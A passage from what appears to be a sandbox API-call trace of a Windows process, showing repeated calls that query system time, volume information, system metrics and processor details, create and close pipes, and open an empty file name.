lpReOpenBuff=0x17d8c0, uStyle=0xf54 | out: lpReOpenBuff=0x17d8c0) returned 0x0 [0037.468] GetFileTime (in: hFile=0x0, lpCreationTime=0x17d950, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17d950*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.468] FileTimeToSystemTime (in: lpFileTime=0x17d950, lpSystemTime=0x17d898 | out: lpSystemTime=0x17d898) returned 1 [0037.468] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x17d828, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x17d894, lpMaximumComponentLength=0x17d788, lpFileSystemFlags=0x17d790, lpFileSystemNameBuffer=0x17d798, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17d894*=0x9c354b42, lpMaximumComponentLength=0x17d788*=0xff, lpFileSystemFlags=0x17d790*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.468] GetSystemTime (in: lpSystemTime=0x17d388 | out: lpSystemTime=0x17d388*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.468] OpenFile (in: lpFileName="", lpReOpenBuff=0x17d3a0, uStyle=0x0 | out: lpReOpenBuff=0x17d3a0) returned 0xffffffff [0037.468] GetFileTime (in: hFile=0x0, lpCreationTime=0x17d42c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17d42c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.468] FileTimeToSystemTime (in: lpFileTime=0x17d42c, lpSystemTime=0x17d378 | out: lpSystemTime=0x17d378) returned 1 [0037.468] CreatePipe (in: hReadPipe=0x17d374, hWritePipe=0x17d35c, lpPipeAttributes=0x17d350, nSize=0x0 | out: hReadPipe=0x17d374*=0x180, hWritePipe=0x17d35c*=0x17c) returned 1 [0037.468] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.468] CloseHandle (hObject=0x180) returned 1 [0037.468] CloseHandle (hObject=0x17c) returned 1 [0037.468] GetSystemMetrics (nIndex=19) returned 1 [0037.468] GetSystemMetrics (nIndex=23) returned 0 [0037.468] GetSystemInfo (in: lpSystemInfo=0x17ce7c | out: lpSystemInfo=0x17ce7c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.468] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x17cab0, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x17cb20, lpMaximumComponentLength=0x17ca10, lpFileSystemFlags=0x17ca18, lpFileSystemNameBuffer=0x17ca20, nFileSystemNameSize=0xf55 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17cb20*=0x9c354b42, lpMaximumComponentLength=0x17ca10*=0xff, lpFileSystemFlags=0x17ca18*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.468] GetSystemMetrics (nIndex=19) returned 1 [0037.468] GetSystemMetrics (nIndex=23) returned 0 [0037.468] GetSystemInfo (in: lpSystemInfo=0x17c9c4 | out: lpSystemInfo=0x17c9c4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.469] CreatePipe (in: hReadPipe=0x17c9c0, hWritePipe=0x17c9a8, lpPipeAttributes=0x17c99c, nSize=0x0 | out: hReadPipe=0x17c9c0*=0x17c, hWritePipe=0x17c9a8*=0x180) returned 1 [0037.469] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.469] CloseHandle (hObject=0x17c) returned 1 [0037.469] CloseHandle (hObject=0x180) returned 1 [0037.469] CreatePipe (in: hReadPipe=0x17c1c0, hWritePipe=0x17c1a8, lpPipeAttributes=0x17c19c, nSize=0x0 | out: hReadPipe=0x17c1c0*=0x180, hWritePipe=0x17c1a8*=0x17c) returned 1 [0037.469] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.469] CloseHandle (hObject=0x180) returned 1 [0037.469] CloseHandle (hObject=0x17c) returned 1 [0037.469] GetSystemMetrics (nIndex=19) returned 1 [0037.469] GetSystemMetrics (nIndex=23) returned 0 [0037.469] GetSystemInfo (in: lpSystemInfo=0x17bccc | out: lpSystemInfo=0x17bccc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.469] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x17bc58, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x17bcc8, lpMaximumComponentLength=0x17bbb8, lpFileSystemFlags=0x17bbc0, lpFileSystemNameBuffer=0x17bbc8, nFileSystemNameSize=0xf55 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17bcc8*=0x9c354b42, lpMaximumComponentLength=0x17bbb8*=0xff, lpFileSystemFlags=0x17bbc0*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.469] GetSystemTime (in: lpSystemTime=0x17bb08 | out: lpSystemTime=0x17bb08*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.469] OpenFile (in: lpFileName="", lpReOpenBuff=0x17bb20, uStyle=0x0 | out: lpReOpenBuff=0x17bb20) returned 0xffffffff [0037.469] GetFileTime (in: hFile=0x0, lpCreationTime=0x17bbb0, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17bbb0*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.469] FileTimeToSystemTime (in: lpFileTime=0x17bbb0, lpSystemTime=0x17baf8 | out: lpSystemTime=0x17baf8) returned 1 [0037.469] CreatePipe (in: hReadPipe=0x17b7a0, hWritePipe=0x17b788, lpPipeAttributes=0x17b77c, nSize=0x0 | out: hReadPipe=0x17b7a0*=0x17c, hWritePipe=0x17b788*=0x180) returned 1 [0037.469] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.469] CloseHandle (hObject=0x17c) returned 1 [0037.469] CloseHandle (hObject=0x180) returned 1 [0037.469] GetSystemTime (in: lpSystemTime=0x17b248 | out: lpSystemTime=0x17b248*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.469] OpenFile (in: lpFileName="", lpReOpenBuff=0x17b260, uStyle=0x0 | out: lpReOpenBuff=0x17b260) returned 0xffffffff [0037.469] GetFileTime (in: hFile=0x0, lpCreationTime=0x17b2f0, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17b2f0*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.469] FileTimeToSystemTime (in: lpFileTime=0x17b2f0, lpSystemTime=0x17b238 | out: lpSystemTime=0x17b238) returned 1 [0037.469] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x17b1c8, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x17b234, lpMaximumComponentLength=0x17b128, lpFileSystemFlags=0x17b130, lpFileSystemNameBuffer=0x17b138, nFileSystemNameSize=0x1ea9 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17b234*=0x9c354b42, lpMaximumComponentLength=0x17b128*=0xff, lpFileSystemFlags=0x17b130*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.470] GetSystemMetrics (nIndex=19) returned 1 [0037.470] GetSystemMetrics (nIndex=23) returned 0 [0037.470] GetSystemInfo (in: lpSystemInfo=0x17ad88 | out: lpSystemInfo=0x17ad88*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.470] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x17ad18, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x17ad84, lpMaximumComponentLength=0x17ac78, lpFileSystemFlags=0x17ac80, lpFileSystemNameBuffer=0x17ac88, nFileSystemNameSize=0x1ea9 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x17ad84*=0x9c354b42, lpMaximumComponentLength=0x17ac78*=0xff, lpFileSystemFlags=0x17ac80*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.470] CreatePipe (in: hReadPipe=0x17ac74, hWritePipe=0x17ac5c, lpPipeAttributes=0x17ac50, nSize=0x0 | out: hReadPipe=0x17ac74*=0x180, hWritePipe=0x17ac5c*=0x17c) returned 1 [0037.470] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.470] CloseHandle (hObject=0x180) returned 1 [0037.470] CloseHandle (hObject=0x17c) returned 1 [0037.470] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.470] GetStdHandle (nStdHandle=0x1ea9) returned 0xffffffff [0037.470] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.470] GetSystemMetrics (nIndex=19) returned 1 [0037.470] GetSystemMetrics (nIndex=23) returned 0 [0037.470] GetSystemInfo (in: lpSystemInfo=0x17a404 | out: lpSystemInfo=0x17a404*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.471] CreatePipe (in: hReadPipe=0x17a400, hWritePipe=0x17a3e8, lpPipeAttributes=0x17a3dc, nSize=0x0 | out: hReadPipe=0x17a400*=0x17c, hWritePipe=0x17a3e8*=0x180) returned 1 [0037.471] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.471] CloseHandle (hObject=0x17c) returned 1 [0037.471] CloseHandle (hObject=0x180) returned 1 [0037.471] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.471] GetStdHandle (nStdHandle=0x1) returned 0xffffffff [0037.471] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.471] GetSystemTime (in: lpSystemTime=0x179b30 | out: lpSystemTime=0x179b30*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.471] OpenFile (in: lpFileName="", lpReOpenBuff=0x179b48, uStyle=0x0 | out: lpReOpenBuff=0x179b48) returned 0xffffffff [0037.471] GetFileTime (in: hFile=0x0, lpCreationTime=0x179bd8, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x179bd8*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.471] FileTimeToSystemTime (in: lpFileTime=0x179bd8, lpSystemTime=0x179b20 | out: lpSystemTime=0x179b20) returned 1 [0037.471] CreatePipe (in: hReadPipe=0x179b1c, hWritePipe=0x179b04, lpPipeAttributes=0x179af8, nSize=0x0 | out: hReadPipe=0x179b1c*=0x180, hWritePipe=0x179b04*=0x17c) returned 1 [0037.471] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.471] CloseHandle (hObject=0x180) returned 1 [0037.471] CloseHandle (hObject=0x17c) returned 1 [0037.471] GetSystemTime (in: lpSystemTime=0x179270 | out: lpSystemTime=0x179270*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.471] OpenFile (in: lpFileName="", lpReOpenBuff=0x179288, uStyle=0x0 | out: lpReOpenBuff=0x179288) returned 0xffffffff [0037.471] GetFileTime (in: hFile=0x0, lpCreationTime=0x179314, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x179314*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.471] FileTimeToSystemTime (in: lpFileTime=0x179314, lpSystemTime=0x179260 | out: lpSystemTime=0x179260) returned 1 [0037.471] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.471] GetStdHandle (nStdHandle=0xf55) returned 0xffffffff [0037.471] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.471] GetSystemMetrics (nIndex=19) returned 1 [0037.471] GetSystemMetrics (nIndex=23) returned 0 [0037.471] GetSystemInfo (in: lpSystemInfo=0x178e98 | out: lpSystemInfo=0x178e98*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.471] CreatePipe (in: hReadPipe=0x178e94, hWritePipe=0x178e7c, lpPipeAttributes=0x178e70, nSize=0x0 | out: hReadPipe=0x178e94*=0x17c, hWritePipe=0x178e7c*=0x180) returned 1 [0037.471] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.471] CloseHandle (hObject=0x17c) returned 1 [0037.471] CloseHandle (hObject=0x180) returned 1 [0037.471] GetSystemTime (in: lpSystemTime=0x178938 | out: lpSystemTime=0x178938*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.471] OpenFile (in: lpFileName="", lpReOpenBuff=0x178950, uStyle=0x0 | out: lpReOpenBuff=0x178950) returned 0xffffffff [0037.471] GetFileTime (in: hFile=0x0, lpCreationTime=0x1789e0, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1789e0*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.472] FileTimeToSystemTime (in: lpFileTime=0x1789e0, lpSystemTime=0x178928 | out: lpSystemTime=0x178928) returned 1 [0037.472] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1788b8, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x178924, lpMaximumComponentLength=0x178818, lpFileSystemFlags=0x178820, lpFileSystemNameBuffer=0x178828, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x178924*=0x9c354b42, lpMaximumComponentLength=0x178818*=0xff, lpFileSystemFlags=0x178820*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.472] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.472] GetStdHandle (nStdHandle=0x7ab) returned 0xffffffff [0037.472] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.472] CreatePipe (in: hReadPipe=0x178498, hWritePipe=0x178480, lpPipeAttributes=0x178474, nSize=0x0 | out: hReadPipe=0x178498*=0x180, hWritePipe=0x178480*=0x17c) returned 1 [0037.472] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.472] CloseHandle (hObject=0x180) returned 1 [0037.472] CloseHandle (hObject=0x17c) returned 1 [0037.472] GetSystemMetrics (nIndex=19) returned 1 [0037.472] GetSystemMetrics (nIndex=23) returned 0 [0037.472] GetSystemInfo (in: lpSystemInfo=0x177fa4 | out: lpSystemInfo=0x177fa4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.472] GetSystemTime (in: lpSystemTime=0x177ba0 | out: lpSystemTime=0x177ba0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.472] OpenFile (in: lpFileName="", lpReOpenBuff=0x177bb8, uStyle=0x7aa | out: lpReOpenBuff=0x177bb8) returned 0x0 [0037.472] GetFileTime (in: hFile=0x0, lpCreationTime=0x177c44, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x177c44*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.472] FileTimeToSystemTime (in: lpFileTime=0x177c44, lpSystemTime=0x177b90 | out: lpSystemTime=0x177b90) returned 1 [0037.472] CreatePipe (in: hReadPipe=0x177b8c, hWritePipe=0x177b74, lpPipeAttributes=0x177b68, nSize=0x0 | out: hReadPipe=0x177b8c*=0x17c, hWritePipe=0x177b74*=0x180) returned 1 [0037.472] SetHandleInformation (hObject=0x180, dwMask=0x1, dwFlags=0x0) returned 1 [0037.472] CloseHandle (hObject=0x17c) returned 1 [0037.472] CloseHandle (hObject=0x180) returned 1 [0037.472] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x177670, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x1776dc, lpMaximumComponentLength=0x1775d0, lpFileSystemFlags=0x1775d8, lpFileSystemNameBuffer=0x1775e0, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1776dc*=0x9c354b42, lpMaximumComponentLength=0x1775d0*=0xff, lpFileSystemFlags=0x1775d8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.472] GetSystemMetrics (nIndex=19) returned 1 [0037.472] GetSystemMetrics (nIndex=23) returned 0 [0037.473] GetSystemInfo (in: lpSystemInfo=0x177584 | out: lpSystemInfo=0x177584*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.473] GetSystemTime (in: lpSystemTime=0x177180 | out: lpSystemTime=0x177180*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.473] OpenFile (in: lpFileName="", lpReOpenBuff=0x177198, uStyle=0x7aa | out: lpReOpenBuff=0x177198) returned 0x0 [0037.473] GetFileTime (in: hFile=0x0, lpCreationTime=0x177224, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x177224*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.473] FileTimeToSystemTime (in: lpFileTime=0x177224, lpSystemTime=0x177170 | out: lpSystemTime=0x177170) returned 1 [0037.473] GetSystemMetrics (nIndex=19) returned 1 [0037.473] GetSystemMetrics (nIndex=23) returned 0 [0037.473] GetSystemInfo (in: lpSystemInfo=0x177124 | out: lpSystemInfo=0x177124*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.473] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1770b0, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x177120, lpMaximumComponentLength=0x177010, lpFileSystemFlags=0x177018, lpFileSystemNameBuffer=0x177020, nFileSystemNameSize=0xf55 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x177120*=0x9c354b42, lpMaximumComponentLength=0x177010*=0xff, lpFileSystemFlags=0x177018*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.473] GetSystemTime (in: lpSystemTime=0x176c10 | out: lpSystemTime=0x176c10*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.473] OpenFile (in: lpFileName="", lpReOpenBuff=0x176c28, uStyle=0x0 | out: lpReOpenBuff=0x176c28) returned 0xffffffff [0037.473] GetFileTime (in: hFile=0x0, lpCreationTime=0x176cb4, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x176cb4*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.473] FileTimeToSystemTime (in: lpFileTime=0x176cb4, lpSystemTime=0x176c00 | out: lpSystemTime=0x176c00) returned 1 [0037.473] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.473] GetStdHandle (nStdHandle=0x16ff) returned 0xffffffff [0037.473] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.473] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x176b68, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x176bd8, lpMaximumComponentLength=0x176ac8, lpFileSystemFlags=0x176ad0, lpFileSystemNameBuffer=0x176ad8, nFileSystemNameSize=0x1 | out: lpVolumeNameBuffer="", lpVolumeSerialNumber=0x176bd8*=0x0, lpMaximumComponentLength=0x176ac8*=0x0, lpFileSystemFlags=0x176ad0*=0x0, lpFileSystemNameBuffer="") returned 0 [0037.473] GetSystemMetrics (nIndex=19) returned 1 [0037.473] GetSystemMetrics (nIndex=23) returned 0 [0037.473] GetSystemInfo (in: lpSystemInfo=0x176a7c | out: lpSystemInfo=0x176a7c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.473] GetSystemTime (in: lpSystemTime=0x176678 | out: lpSystemTime=0x176678*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.473] OpenFile (in: lpFileName="", lpReOpenBuff=0x176690, uStyle=0x7aa | out: lpReOpenBuff=0x176690) returned 0x0 [0037.473] GetFileTime (in: hFile=0x0, lpCreationTime=0x17671c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x17671c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.473] FileTimeToSystemTime (in: lpFileTime=0x17671c, lpSystemTime=0x176668 | out: lpSystemTime=0x176668) returned 1 [0037.473] GetVolumeInformationA (in: lpRootPathName=0x0, lpVolumeNameBuffer=0x1765f8, nVolumeNameSize=0x7aa, lpVolumeSerialNumber=0x176664, lpMaximumComponentLength=0x176558, lpFileSystemFlags=0x176560, lpFileSystemNameBuffer=0x176568, nFileSystemNameSize=0x7ab | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x176664*=0x9c354b42, lpMaximumComponentLength=0x176558*=0xff, lpFileSystemFlags=0x176560*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0037.474] GetSystemMetrics (nIndex=19) returned 1 [0037.474] GetSystemMetrics (nIndex=23) returned 0 [0037.474] GetSystemInfo (in: lpSystemInfo=0x1761b8 | out: lpSystemInfo=0x1761b8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.474] GetSystemTime (in: lpSystemTime=0x176108 | out: lpSystemTime=0x176108*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.474] OpenFile (in: lpFileName="", lpReOpenBuff=0x176120, uStyle=0x7aa | out: lpReOpenBuff=0x176120) returned 0x0 [0037.474] GetFileTime (in: hFile=0x0, lpCreationTime=0x1761b0, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1761b0*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.474] FileTimeToSystemTime (in: lpFileTime=0x1761b0, lpSystemTime=0x1760f8 | out: lpSystemTime=0x1760f8) returned 1 [0037.474] GetSystemTime (in: lpSystemTime=0x175cf8 | out: lpSystemTime=0x175cf8*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.474] OpenFile (in: lpFileName="", lpReOpenBuff=0x175d10, uStyle=0x0 | out: lpReOpenBuff=0x175d10) returned 0xffffffff [0037.474] GetFileTime (in: hFile=0x0, lpCreationTime=0x175d9c, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x175d9c*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.474] FileTimeToSystemTime (in: lpFileTime=0x175d9c, lpSystemTime=0x175ce8 | out: lpSystemTime=0x175ce8) returned 1 [0037.474] CreatePipe (in: hReadPipe=0x175ce4, hWritePipe=0x175ccc, lpPipeAttributes=0x175cc0, nSize=0x0 | out: hReadPipe=0x175ce4*=0x180, hWritePipe=0x175ccc*=0x17c) returned 1 [0037.474] SetHandleInformation (hObject=0x17c, dwMask=0x1, dwFlags=0x0) returned 1 [0037.474] CloseHandle (hObject=0x180) returned 1 [0037.474] CloseHandle (hObject=0x17c) returned 1 [0037.474] GetStdHandle (nStdHandle=0x0) returned 0xffffffff [0037.474] GetStdHandle (nStdHandle=0x16ff) returned 0xffffffff [0037.474] SetHandleInformation (hObject=0x0, dwMask=0x0, dwFlags=0x0) returned 0 [0037.474] GetSystemTime (in: lpSystemTime=0x175410 | out: lpSystemTime=0x175410*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x29, wMilliseconds=0x3da)) [0037.474] OpenFile (in: lpFileName="", lpReOpenBuff=0x175428, uStyle=0x0 | out: lpReOpenBuff=0x175428) returned 0xffffffff [0037.474] GetFileTime (in: hFile=0x0, lpCreationTime=0x1754b4, lpLastAccessTime=0x0, lpLastWriteTime=0x0 | out: lpCreationTime=0x1754b4*(dwLowDateTime=0x0, dwHighDateTime=0x0), lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 0 [0037.474] FileTimeToSystemTime (in: lpFileTime=0x1754b4, lpSystemTime=0x175400 | out: lpSystemTime=0x175400) returned 1 [0037.474] GetSystemMetrics (nIndex=19) returned 1 [0037.474] GetSystemMetrics (nIndex=23) returned 0 [0037.474] GetSystemInfo (in: lpSystemInfo=0x1753b4 | out: lpSystemInfo=0x1753b4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0037.474] GetVolumeInformationA (in: lpRootPathName=0x0, 